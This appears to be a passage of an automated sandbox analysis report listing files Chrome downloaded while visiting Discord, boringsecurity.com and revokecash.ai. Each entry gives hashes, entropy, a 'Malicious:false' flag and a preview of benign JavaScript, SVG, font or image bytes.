                                                                          Preview:<svg width="24" height="20" viewBox="0 0 24 20" fill="none" xmlns="http://www.w3.org/2000/svg">.<path d="M24 2.66563C23.0997 3.05681 22.1472 3.31452 21.1725 3.43063C22.1968 2.83082 22.9672 1.87792 23.339 0.750633C22.3705 1.31693 21.3128 1.71427 20.211 1.92563C19.747 1.4394 19.1891 1.05259 18.571 0.788706C17.9529 0.524826 17.2876 0.389391 16.6155 0.390633C13.8945 0.390633 11.6925 2.56063 11.6925 5.23563C11.6906 5.60772 11.7332 5.97869 11.8195 6.34063C9.86834 6.24916 7.95776 5.75142 6.20999 4.87926C4.46222 4.0071 2.91574 2.77971 1.6695 1.27563C1.23229 2.01269 1.00107 2.85365 1 3.71063C1 5.39063 1.8765 6.87563 3.2 7.74563C2.41586 7.72702 1.6478 7.51948 0.961 7.14063V7.20063C0.961 9.55063 2.661 11.5056 4.911 11.9506C4.48789 12.0634 4.05188 12.1206 3.614 12.1206C3.30329 12.1212 2.99328 12.091 2.6885 12.0306C3.314 13.9556 5.1345 15.3556 7.291 15.3956C5.53869 16.7461 3.38731 17.476 1.175 17.4706C0.782309 17.47 0.389983 17.4467 0 17.4006C2.25059 18.8377 4.86672 19.5979 7.537 19.5906C16.605 19.
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (17039)
                                                                          Category:downloaded
                                                                          Size (bytes):17094
                                                                          Entropy (8bit):5.57815866051765
                                                                          Encrypted:false
                                                                          SSDEEP:384:LfPTy5wQO0QhEeLVwbF3ZZCCe+5OGlabe:bcOPRuXCCTOGlae
                                                                          MD5:FFBEDF08C61DFF475A14187BDF60C12E
                                                                          SHA1:FE497F6BA7D1D16544CC91CFCB3462B5ADC6AF91
                                                                          SHA-256:06ABF40DA93C0C497D41391836F9123B7F129A71E3A78804300CDB838E87C1AA
                                                                          SHA-512:5ACFE500D11BDF237642ADA939AFC5523FCBD8B9936FE6CFE280F55F228F871BE884676755D46D215827405AC3A73655B8EF6FBDC59C920F0A52EA93C60060A3
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/82082.66eccead8076cc2a44a4.js
                                                                          Preview:(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["82082"],{891722:function(e,n,t){"use strict";t.r(n),t.d(n,{ArrowSmallLeftIcon:function(){return o}});var l=t("37983");t("884691");var u=t("669491"),i=t("75196");let o=e=>{let{width:n=24,height:t=24,color:o=u.default.colors.INTERACTIVE_NORMAL,colorClass:a="",...r}=e;return(0,l.jsx)("svg",{...(0,i.default)(r),xmlns:"http://www.w3.org/2000/svg",width:n,height:t,fill:"none",viewBox:"0 0 24 24",children:(0,l.jsx)("path",{fill:"string"==typeof o?o:o.css,d:"M3.3 11.3a1 1 0 0 0 0 1.4l5 5a1 1 0 0 0 1.4-1.4L6.42 13H20a1 1 0 1 0 0-2H6.41l3.3-3.3a1 1 0 0 0-1.42-1.4l-5 5Z",className:a})})}},299147:function(e,n,t){"use strict";t.r(n),t.d(n,{default:function(){return i},useCustomCallSoundsExperiment:function(){return o}});var l=t("862205");let u=(0,l.createExperiment)({kind:"user",id:"2023-06_custom_call_sounds",label:"Custom Call Sounds",defaultConfig:{enabled:!1,showVoiceChannelCoachmark:!1},treatments:[{id:1,label:"Enabled",co
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:PNG image data, 156 x 156, 8-bit/color RGBA, non-interlaced
                                                                          Category:dropped
                                                                          Size (bytes):21312
                                                                          Entropy (8bit):7.983339853338864
                                                                          Encrypted:false
                                                                          SSDEEP:384:rZFm9Gs77alPJAzd63wTv8RaBU2tGvW5RnuN+9okG1pqV1EHOEFMtZ+/+g/V0mbX:iIssPJh3wTK2tGurP9MLqV18OsZWg/9L
                                                                          MD5:824A84986D79B0472B5A7DACEECE573D
                                                                          SHA1:6BE9327F474929EEE40486EF3D33BE8998DDBEA6
                                                                          SHA-256:38F22ADFAE8653262543676AFE6DE74D4DE63019AEE75EF61B159532EFB8DAF2
                                                                          SHA-512:BF63A4FCFD677C59A7FE5AA2915A3EFACA7D6324BC5A12FD0D282831465E290C6A78130CA547D9C6830C53D1F3C988FA4F7D6F0976EC762FF2D7BD7FBCE04A2B
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:.PNG........IHDR................M....pHYs............... .IDATx...tT..I...MB.z.K3.w.@.IHH.7....w..;...7\.....I..)..lv...&_...<.....I#..r.{.23..s......w......1....m.%.m.JjZ!.m.NR.........Y.y.G...=.......C.e{..1.....LZ.DZ......m.!.6FR.j!.m.H"..oV.c.....G.N...wR.p.x .m.$..Hk.H.>.7..UZ....m&uH_.P)1.Z..+..L.}.k......G..(........X.....,.i}..[L&TR#{A"2..:HJc.....T.........Z.DC!X......c.5m..v......61@.1.9z..*......f.Y%................1pCQ..5.......d.[...(h .+~ax.{..P.2..5..[1`..c.p.!.NZ#W5....+.......~..f.L.D....O.I5.p...enZM.wlR.w.....S<b.jF>..h..op.'.o.....H..~g....5,.?q..G.......3..*Q....~U.*.....N.p..~l.. G.AW...g..k..&h..|.h?..p.........m.'H..Q.......8}~...S.!.........a...U........M......*...=..8.....}.F-.>b&.U.qh}B..z....8:VJX>*......J.^..............p..X)R.%.r$.. ?S..5....xla.'e..U.....a.C..Z\@W).K.4....69<....B[.H(.J.(..t5..C....O.p:Ox..`QWLq.V2...?sP.b..m....G..aR.3..N.99.J.. &U^R.}G...F..$.......".....tz.&V..Q8..).....=..>_..75
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:Unicode text, UTF-8 text, with very long lines (65484), with no line terminators
                                                                          Category:downloaded
                                                                          Size (bytes):251515
                                                                          Entropy (8bit):5.42778038800345
                                                                          Encrypted:false
                                                                          SSDEEP:6144:7o1oMzw2NUG4kSdZREO66kekwzk4RlFUVIrYVl0:2lw4O
                                                                          MD5:8A80373E052B7522EB8610CA5877CC7C
                                                                          SHA1:CEDBC155F92F60548D64C6F6EFF19DF6AC454AA1
                                                                          SHA-256:D523C5CA6FA18B62B4E28B917F7E9F2613984BA4D08EB25CE128EE822417A4FA
                                                                          SHA-512:49A886553033B652EF74B97F8658C7F61CB5F259BB0CC11550DC96D449620920308A3BD7A914B670F210749C664D05AF1733747F351DA94A0EBF7304C5895246
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://boringsecurity.com/_next/static/chunks/364.0af60d1a7584dacb.js
                                                                          Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[364],{61326:function(e,t,r){"use strict";t.Xx=t._w=t.aP=t.KS=t.jQ=void 0,r(54889);let i=r(21318);function n(e){let t=new Float64Array(16);if(e)for(let r=0;r<e.length;r++)t[r]=e[r];return t}r(49644),t.jQ=64,t.KS=64,t.aP=32;let s=new Uint8Array(32);s[0]=9;let o=n(),a=n([1]),c=(n([30883,4953,19914,30187,55467,16705,2637,112,59544,30585,16505,36039,65139,11119,27886,20995]),n([61785,9906,39828,60374,45398,33411,5274,224,53552,61171,33010,6542,64743,22239,55772,9222])),h=n([54554,36645,11616,51542,42930,38181,51040,26924,56412,64982,57905,49316,21502,52590,14035,8553]),l=n([26200,26214,26214,26214,26214,26214,26214,26214,26214,26214,26214,26214,26214,26214,26214,26214]);function u(e,t){for(let r=0;r<16;r++)e[r]=0|t[r]}function p(e){let t=1;for(let r=0;r<16;r++){let i=e[r]+t+65535;t=Math.floor(i/65536),e[r]=i-65536*t}e[0]+=t-1+37*(t-1)}function f(e,t,r){let i=~(r-1);for(let r=0;r<16;r++){let n=i&(e[r]^t[r]);e[r]^=n,t[r]^=n}}function d(
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:PNG image data, 2500 x 1406, 8-bit colormap, non-interlaced
                                                                          Category:dropped
                                                                          Size (bytes):869348
                                                                          Entropy (8bit):7.965493839376428
                                                                          Encrypted:false
                                                                          SSDEEP:24576:acP6aQySngCk3Kyh6tuMxUBkZiHoPLQyWkrh8Z:U7ZQKyc1UBwiHoTQyWEh8Z
                                                                          MD5:96B4D5F9067796255FF0879E85140F59
                                                                          SHA1:E4DF2F4B2F164B83029B1E3370F2CE39F93F7ECF
                                                                          SHA-256:9BFA50C992AA9D459AA8C5487CB79901797848C4EB544BF32FCD617A2B0826C2
                                                                          SHA-512:9BAE46E7469BA5C9478D9D21C73E6B214F938B98EF9DF6853B961B6F26C501E0C1AC319B514C78CD539FF628EF95A71B734E5F9A443FF9DBD5778FBDCA98B278
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:.PNG........IHDR.......~.....e\_h....PLTE.`/...6 %e.ZO-../..X72X0.T`_>)Z4..U5....3.....8.A.5.J6.=.q..T8"l=.....*..S4.5++..:~6.\7......\..F.65z7w.'#.._T'2v6.$.#k8.N0G.84..,n9.X1.G........>*._7.#..>1.g7...!i4k@$.7 ...@$.q8..Y+.d7.r8..3H&..,'A{87..U./._24s: ...vI.`6)l4;w8vC.....\3.T(/..@*.}I#6#.1o3.L%.d3n.C.N+...]nx(q8E.....N1 .=!.D'...6b..}4(..#.*0g0a8.1..:~>oE,.$5|[#.D".V.:u1.H!C&+.-.U... .R8A.......N) Q%'a/.P3T..:..."s..zM1.w<&..6.xb.?&Z(I.G.pD75;C.Cow...SMFL.j:...0,2G,5.9Y.PW*.*I) 8 S.>.e,(..C<E...}QOXo;`8;vBA:.f2.OuH.a:3;P}qp.Q.y.i..-Ei@`[^.r+...hA.vGcG.6..zO[y.M.2Q..9#?.it'...#->c......7nsKWd@I...+LwmFPTH!...Vi[:B....%Moff...^&:.CFR[Jh(f.fBKf..(.b.Gw.U...P5..B.......k.........vf=}&8...yG....B?.".ib...M.I..e...6<...Eb...*i^&TP._s.h0vm....Uc.SP.<[."..Pu......Yp.w.F....,._.....I....ta.Y.....IDATx....T.......W.Q".E...#..u28d..NW.P.(...N...8H.. .$.... .t.&..@.App.....4O.K..^/.O..6....>.s.ca..|B...?.........0t..pz.i...B...q....+..=..~V.<.e.n....;n..G.......k..,.s+..F.
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:JPEG image data, baseline, precision 8, 156x156, components 3
                                                                          Category:dropped
                                                                          Size (bytes):5081
                                                                          Entropy (8bit):7.90479028644365
                                                                          Encrypted:false
                                                                          SSDEEP:96:PjODyxKeYSf/tZBv27fB8KTLS8bI3bXd9UspIWNEWr+4qFGOv3qTyH:P3EejnN2bB8KTLwAWr+zvr
                                                                          MD5:BC04E72C32FFEB1D7CEA789D7A42FDA7
                                                                          SHA1:507C5E5E6EDEF0FE6E4CF32B032EE67C45DA8FAE
                                                                          SHA-256:74B9D08548B30C8D427967BBCEFC9CA4DA7DAD3D8D3408775418D37CE0CC466F
                                                                          SHA-512:0DFFDCBD30DDFD99201232C44863FE04C6FC7E2D1DE43C18B520C2D77367992806A67CC8A356358CFF25B36B99FA16049BCB4E7FC032E9385D4336629DB576AC
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:.....C.....................................%...#... , #&')*)..-0-(0%()(...C...........(...((((((((((((((((((((((((((((((((((((((((((((((((((..........."........................................L.........................!...1"A.Q.245aqrs.......6tu..#$3RUV....&BDEW.....................................5........................!1A.Qq..."3.a...#24r.b.................?...JU..)J...(BW.J..f.B...eq...K*w;.. R5...6.).Z7....M^.t..#2!3&D.#%.....~-.j[d.......(..o';y....\....M..u...O..U:j.W^../..j..Bs..PW ..i. .1.e..e..^&.......9...u.J.(y.=...[F.....{....)J...)J...(BR...JR.%)X.u..[...m%KZ.....{...s..m;....J..Z.IZP.eg$.$...Z.$9.y.G..........m.X.{3....._....W..m.\m.....UU..~.H...wi...!( ..q.7....{..4....j8\.`..+...ck....d.K....s...R{glT....=:.<.Z#.r.9zI\.....1.5.....Z......k-Z..Z.....A..1..6.Vc.u.......m....m.dHa...s..@$...5..`^....<....JF...|.}.:.Cm..&.JHPXIx..;..qa.....P.z..RJ.m%.'?.M..w...8.v^\..sVn....v..6.s....I#...'.............3&.%1py..h\.@T...x.N.N.okS.7.e.
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):18
                                                                          Entropy (8bit):3.836591668108979
                                                                          Encrypted:false
                                                                          SSDEEP:3:Fq2Ln:82Ln
                                                                          MD5:129ABF301E12DA2879ECA02A1BE6065A
                                                                          SHA1:EC9109C291BC83CF628BB091FFA8617CDDBB43E9
                                                                          SHA-256:6AEDD7F59ED412B7F9F89CBFFFA28DF97744A820B1B75A339E3A4F9F2AA1F9A9
                                                                          SHA-512:0E3AF1215284F47285A4AF248FC7ED85AA0FC461222E7504DB16F610BC81ED3685AFE443325A5DED2BF1CC0E3A1C804693B24116CEECB6D35E61AF65F0A5972F
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:GET query missing.
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:Web Open Font Format (Version 2), TrueType, length 18872, version 1.0
                                                                          Category:downloaded
                                                                          Size (bytes):18872
                                                                          Entropy (8bit):7.988653263671213
                                                                          Encrypted:false
                                                                          SSDEEP:384:tHSKMVj06kq2h2Rb56wnLxpwpeuhMlS+h2ns/CGp93mlDy9qstNG8c:RSSq2hg57LjwpOh2ns/r2s9qstNG5
                                                                          MD5:839CBFF82AAE35FD513B82DAD44631D1
                                                                          SHA1:842D9407025925C09942BC0EC18E4F20F5519F63
                                                                          SHA-256:5252F5D080B6FAFA30A6137CF6F6B0DBF351333670AD1FAE678F97F3FA02AF24
                                                                          SHA-512:DFD72CD34AD2F7F6390BC7CEFDB916E2EDFB08BB645EE5DF12428C1CCB422DC0EFAA29FFD775110D2C9324E41305FF7A41197E3D9051A2DBD4676951108F1C17
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://boringsecurity.com/fonts/gunplay.woff2
                                                                          Preview:wOF2......I...........IP........................?FFTM..*....l.`..Z.,..e.....X.....L..6.$.... ..n..3..^...5l.N=.[U.......`.@.x6...6..x........CzP.n.9+.aw.T(,8U..g.Y.j..;..O.......b...D.SA.=...p.~....h.......L~..a^.j.b...r.F..4 ......K.!.\...../..zD..:..F.$..k..=9,..H.IV>.......a.. .[..m......Qsa.&...F....p.X.&.V..#..6.f.o.~j.Gf}}}..m}....C...........p+..p..+%`.:.0...E......... ..|aIEt.....T..y*L..o.yC..........G..R...;Q..7.g.........9...$D.T.....}/..<^...V ..]....$.m....Tl.&.K-..hS.....;X..M...b...6......>/\.$.0.|..1}.2U.....T.-....:..JP.ebe`.~!....(...!.Y9.C..f..t.y'U...O...e...%.(.:......._......|..TR...c;L~*.4....../E.;....kYq.r@....L.CJ.4.O.R.x* .....S.......w7...J8.74.^ ..tW..i.....`b......f..XpL.M...&..87`@JV.V....D..T......w..h.. . ..3aDu....E...#P.$..w.d.r...y.,.h..lxV..8{...,I.....i?{.g}...8DD.q.m$....%Skp....V(..*..`W2..l.q/..Q....%M`...D...o{4.....o.W\.".rX...X/Q..r.=AD.z..c...r..4.GPa.e]{.3.B.-/..[ X\...;..........V..a)......1
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:JPEG image data, progressive, precision 8, 48x48, components 3
                                                                          Category:downloaded
                                                                          Size (bytes):1222
                                                                          Entropy (8bit):6.805871143233324
                                                                          Encrypted:false
                                                                          SSDEEP:24:V9YMWqRjmZbcAjyzmnAz1DHoA721wvqsW2abIfg2X4laz6LXTtZkvdKNk:V9YM3W4AWzmAZDHTAsW23h4la/vcW
                                                                          MD5:47756FB34C53E9EE00833D8E5B3DCED0
                                                                          SHA1:F75330384CCB7CEE519B13BD11E36C2F1739A2BA
                                                                          SHA-256:8FABED570D58359D56BAC0AE085B7D320C35C674F19E7BE041C770E8740D14D1
                                                                          SHA-512:E4388058B535D0EA7A6DB9A6BB80A0232F04F738F748D093409D77074CA97C184732771E606B286CC98DB893F7C55D7C8819214BC92C9CAB62AD67DBBE7C369E
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:"https://boringsecurity.com/_ipx/w_48,q_75/https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Fthumbnail_fantasy_a05d6f97a9.jpeg?url=https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Fthumbnail_fantasy_a05d6f97a9.jpeg&w=48&q=75"
                                                                          Preview:.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......0.0.."...........................................................................o..i..F...f.vt)..9.R..g..!..GU....?...!.........................!."#1C...........w..[..JM"..E...(.x."...D...*.WF.....]:......)..NrP@....?>-{....G..x.R..>]...W._.............................!1A........?.T....^]..e.$"...............................!1a........?..-Zv.R..>...]U.......)......................!..AQ1BRa.."2bqr.........?.....d.I.d.M.XM.L.>.9\9.A.=..,.!@m._...-........Vqq..P.l).a<.Q*.... \d.....5...O..... ....................!1AaQq............?!.Y$....'.:Z..y<..]..1.y......a.$.*|..-.<..TU..fQ]..%.|.u..P......{..L/.....d#....Z.O.C..U.NZ.....w.7t1...,...vjc./..e...,.................2K....?........................!1Q........?.i.N.......a.K............................!1.........?.]..'s..!..>.1.|.e....."....................!1aAQq.....
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:PNG image data, 400 x 400, 8-bit colormap, non-interlaced
                                                                          Category:dropped
                                                                          Size (bytes):2802
                                                                          Entropy (8bit):7.788689649591012
                                                                          Encrypted:false
                                                                          SSDEEP:48:apGVMXeZ+mMicG2awED3rlYJwABl3AAUdoXkUefLcVJ/dpQEQOLlq:apeMO8mMicGFwEDOwABlFUueTSJ/2Os
                                                                          MD5:B02008A08A3CC47ABDAF03561CC58CC9
                                                                          SHA1:CCE13F136F86D3D004BA93E0E437DDB6C7CD2924
                                                                          SHA-256:4D9B9747336BE2AE9D8810754E62DC401C6D30E5688311CE12FAC762EAF95585
                                                                          SHA-512:3EC32B20BD300E8B6200F840319C0B3660FFEDB8B3DF8AA700F7CBBF92A0E1ED885B806D182D0D8198EFD78BECA0B29FD92604E4FEAB5639FFA2FE9F249B80D0
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:.PNG........IHDR..............a......PLTE$a.... ^.!_....h.....T...].#`..\."`.,g..[....1k.7o.&b..........<r........P..(d........\.......Dx.......M~...@u.y..a........u.....H{.[.................k...X..o..d...U..g........IDATx...v...a.D...lz...j !.....v.S..!............\......................................................... .tQ....m...RT...E......*...i..<.j.B~..B..9.*..4.XY...a.....C.Dp......_.;S..{..y..4.L.TF..iB...HCJM.4.?vc..V5.4d...e.v M).I..4@4..i..Y.[...9...]D.m.....re;....lG.t.k.Q4..B.llG......2rn;...80.....8...]X...>.yg..fV.1+?v...NC.lG.+'6.s9...v(..[91b....y.$..:.Gn}'f...|...|..J ...akS..C..X..\..Z9.Av.?l.....V.J.....c]..,y....K6......'.=l.mG..7....d...#......i...XR.xu..z...OU.A..6p'G.OT..:$)l....P,...@...~{....*.;.w..3....ea.U].I{..[.0...M.....E.q..<..r.....K.1.....%L+...M..C...)...[g....YJ.M...{&.. .yb..S.. }..g...@...O.T*.....^v...#H....^<....=.........t(u..q.xn{&..[i.J..X.Io5.^w.9.=......ckp.)......S.......%p.r.).^J
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:SVG Scalable Vector Graphics image
                                                                          Category:dropped
                                                                          Size (bytes):688
                                                                          Entropy (8bit):4.422809447424027
                                                                          Encrypted:false
                                                                          SSDEEP:12:t6AbzVKIh4zXvVg/jzDJU0uE2pLAZTX9D1jPb1qcNRxU7EK53TQke:tDbzVKwkXveLPC0uWZjR1LhFFkxhe
                                                                          MD5:C6CE0010471B65C0FAEDA6C53AB297BD
                                                                          SHA1:8735052DE92D694B4EA91CECCAB0E7E8F75A3CC7
                                                                          SHA-256:862046FEE1B4F3744F000347CC0B337871967B2BD9471BCB6DDED2A49A61C527
                                                                          SHA-512:7A054A7E19F80F7735CCDBC13E9CAFA13A779764C1725161B4EC7D3C793CFFB2E56C61109AA5F09A21E9DE3FD46B2E2EC756A6B03E46F4760125D282C14273C4
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:<svg fill="none" height="12" viewBox="0 0 13 12" width="13" xmlns="http://www.w3.org/2000/svg"><path d="m5.39011.540027c.35536-.720037 1.38211-.720036 1.73747.000002l1.18359 2.398201c.14111.28593.41388.48411.72942.52996l2.64661.38457c.7946.11546 1.1119 1.09196.5369 1.65243l-1.9151 1.86674c-.2283.22257-.33252.54323-.2786.8575l.4521 2.63587c.1357.7914-.69496 1.3949-1.40567 1.0213l-2.36717-1.2445c-.28223-.1484-.6194-.1484-.90162 0l-2.36717 1.2445c-.71072.3736-1.54138-.2299-1.40565-1.0213l.45209-2.63587c.0539-.31427-.05029-.63493-.27861-.8575l-1.915083-1.86674c-.574984-.56047-.2576998-1.53697.536908-1.65243l2.646575-.38457c.31554-.04585.58831-.24403.72943-.52996z" fill="#fff"/></svg>
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                          Category:downloaded
                                                                          Size (bytes):855286
                                                                          Entropy (8bit):5.600144222196185
                                                                          Encrypted:false
                                                                          SSDEEP:12288:p6XVkzBWngx23L0fsKwgoTY6Ydu8dQ/P6VQd6kTGjunBBF44sujg3aj:zBHx4csrF447g3aj
                                                                          MD5:26B19B9B724113F0F24CD6D9CF5783F6
                                                                          SHA1:BA61521062BD73407C9B491BA1197237720FD154
                                                                          SHA-256:2CE6A778539D6D2707973AFD6D5A85FAC70EF7B2E5661D88AF3320A60AB31916
                                                                          SHA-512:FC49BF3CD889E615FCCA855CB9C19F07600B1C36628FFFE56B29BEDD7730FED1131032320D561BABFC4291C8F882ADD0573572116B8AC5D816650092A4B9DAA6
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/72243.fd97ea76672332fed74e.js
                                                                          Preview:(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["72243"],{20860:function(e,t,n){var r={"./bg.png":"585337","./cs.png":"83076","./da.png":"228351","./de.png":"96895","./el.png":"954635","./en-GB.png":"883638","./en-US.png":"969851","./es-ES.png":"98918","./fi.png":"110775","./fr.png":"128393","./hi.png":"79794","./hr.png":"988195","./hu.png":"366988","./it.png":"583917","./ja.png":"895466","./ko.png":"879503","./lt.png":"370757","./nl.png":"461053","./no.png":"871682","./pl.png":"140693","./pt-BR.png":"260276","./ro.png":"929905","./ru.png":"830793","./sv-SE.png":"841801","./th.png":"862866","./tr.png":"567215","./uk.png":"142242","./vi.png":"610487","./zh-CN.png":"986521","./zh-TW.png":"204827"};function i(e){return n(s(e))}function s(e){if(!n.o(r,e)){var t=Error("Cannot find module '"+e+"'");throw t.code="MODULE_NOT_FOUND",t}return r[e]}i.id='"20860"',i.keys=function(){return Object.keys(r)},i.resolve=s,e.exports=i},501617:function(e,t,n){"use strict";e.exports=
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:SVG Scalable Vector Graphics image
                                                                          Category:dropped
                                                                          Size (bytes):137
                                                                          Entropy (8bit):4.7861988241054
                                                                          Encrypted:false
                                                                          SSDEEP:3:t6WH7W+IjSKcvUVYEo0LvDmJS4RKb5KVErcHNDPqdcJqGrqL0:t6AbzUOC3mc4slmNDiiAe
                                                                          MD5:7D883BA72B5DBC0229F5D1980205EE34
                                                                          SHA1:678BDA23DF97E8B9C3B15E71C41E7B215D043F22
                                                                          SHA-256:53A0F1F10860A6E4CF9BD3B4949C5DDE68888DBC96BA0DA1020C5958EFC214A5
                                                                          SHA-512:E040F62517C951A0AB2ABC5038F22456E5862166E2A2346345464B9C4B63271CFBD1220BB14D2C39D7FACFD008848ACE682420F1EFE9F4F29265D7177A3C7E16
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:<svg fill="none" height="12" viewBox="0 0 12 12" width="12" xmlns="http://www.w3.org/2000/svg"><path d="m5 2h2v8h-2z" fill="#fff"/></svg>
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                          Category:downloaded
                                                                          Size (bytes):119579
                                                                          Entropy (8bit):5.511996267957397
                                                                          Encrypted:false
                                                                          SSDEEP:1536:oqSzGWtootjU98ejLT2LjS8DbMANt5OHZHGhsMXSO5:t0GfotscLC2
                                                                          MD5:A927C9A7ECD7A283F61C220AF0B9CD11
                                                                          SHA1:1F7A98A759FBE909606553D99CA79E362C38B0C0
                                                                          SHA-256:FE7E5C1A3F8B9A5E30F5087757ED44B3C5742E8B5AA7EE5F0A561F7EE842C7C8
                                                                          SHA-512:9A42AA95834400BC2550A6B2857B77EC73E161ACAEF7FF64C40314867C59F73FA129775C6F5E6CC5B1E54D7224ACEF3B18C88D20665DF9106F4AAE5FC64F7AE4
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/48059.c41375af349f67f19d42.js
                                                                          Preview:(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["48059"],{458960:function(e,t,n){"use strict";n.r(t),n.d(t,{default:function(){return E}}),n("424973");var i=n("122717"),r=n("52296"),o=n.n(r),s=n("773179"),l=n.n(s),a=n("512298"),u=n.n(a);function c(e){let t=Object.keys(e)[0];return"".concat(t,"(").concat(e[t],")")}let d=/rgba\(([\d.]+), ([\d.]+), ([\d.]+), ([\d.]+)\)/;function _(e){let t=e.match(d);return null!=t&&(e="rgba(".concat(0|t[1],", ").concat(0|t[2],", ").concat(0|t[3],", ").concat(t[4],")")),e}i.inject.ApplyAnimatedValues(function(e,t,n){if(e.setNativeProps)e.setNativeProps(t);else{if(!e.nodeType||void 0===e.setAttribute)return!1;var i;u.setValueForStyles(e,((i=t.style)&&(i.transform&&(i.transform=i.WebkitTransform=i.MozTransform=i.transform.map(c).join(" ")),i.color&&(i.color=_(i.color)),i.backgroundColor&&(i.backgroundColor=_(i.backgroundColor))),i),n._reactInternalInstance)}},e=>e);function f(e,t,n){return void 0!==t&&void 0!=n?l.random(t,n):e}var E={
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, progressive, precision 8, 1280x720, components 3
                                                                          Category:downloaded
                                                                          Size (bytes):100997
                                                                          Entropy (8bit):7.939423623665648
                                                                          Encrypted:false
                                                                          SSDEEP:1536:GF4NMbBlLa8TGIno8GcihF5w7GzyPDMQUysrSCzbfA8KNgy:GF4SllPTGIno8GZ5qGosSC31C
                                                                          MD5:E691554E1F1D4C64A4BE3F445613C9AD
                                                                          SHA1:112137B7CB62892F8164D9CB33559931663F612F
                                                                          SHA-256:A8C0D3759DF82693528A00833637918D56803992C7948391AEE5BA1EDF65E467
                                                                          SHA-512:85FC87BC81ADCB810A22628C5239910B10C18F810BD936CEB40841D041BC795E7AB58C066641AEEFBB63A219852A397327EFF90935B34F8ED9E3E03754B75661
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://revokecash.ai/_img/demo-thumb.jpg
                                                                          Preview:......JFIF.....H.H..................................................................................................................................................."....................................................ffRL...$.12HL...L.).)&bRL.....*$..D.$.).....RL.O].V..1)..&b.)LL..%ZEBS"e$.JR.35$.JS..%)%)J...D.$..I...R.*.JR.R..J@..RL."B.."S$...2L...".I$.R..&ffBe=s33$."fHT..R..&*..R...L.H..L.D...).$..e)...T.$.O]T.)J..Ja)..&BIL.$..)LJf*....R..H.RT..$..J.Us*.U!Rz.2&T.....A!"@$. .)...H.....P..D.2U$R.....L......??...|...b................*..d..%.v=.._./.?a.......]..e..G3..v...-..../..L.../X............7...55U\..Ji).E...%.-...m<Ne.}..'g...r/..-g..p{~.............9...5WT..J ...d....-. ............L.H....k.'..LB#.9.c\..'.:....t.#1...&.X...........lWu...g.Zu.....otN..M...L.+.s._..:.X.........4U.Gf.....m.F..=-..o]C...u..................w.?.}...n.....~...h~.~J...z+..c.>....W^..2...^...U.j.z.Q.4.=.H.bm............2.....=....x..v...u+u.S..........................z...]c...&).~..
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:PNG image data, 156 x 156, 8-bit/color RGBA, non-interlaced
                                                                          Category:downloaded
                                                                          Size (bytes):38336
                                                                          Entropy (8bit):7.988197256434672
                                                                          Encrypted:false
                                                                          SSDEEP:768:36bjJUjtPDUAUGAklMslrreu+tz45J1CybGmMNEOtXSqA1:3uatPDESMxRcJjEZC
                                                                          MD5:9EDD264E8B2C02A1C32AF134A2854367
                                                                          SHA1:2502C87D59D86F559811DDA8F7B92E2B312AC0F1
                                                                          SHA-256:1155B866B60FBA05612240FDE786C469E047F4915BB8D63A975125C5CE89E855
                                                                          SHA-512:BAE3A8E3891A088EE948BDBB661CABA70DA0005EE0196F0A1FCFA5B0A4854A7E614E548A7A5EDF048EA5D995DEE5D80BAE61527728496EF766AEDC23992A3E17
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://boring-security-cms.s3.amazonaws.com/thumbnail_bc1_4d96972cb3.png
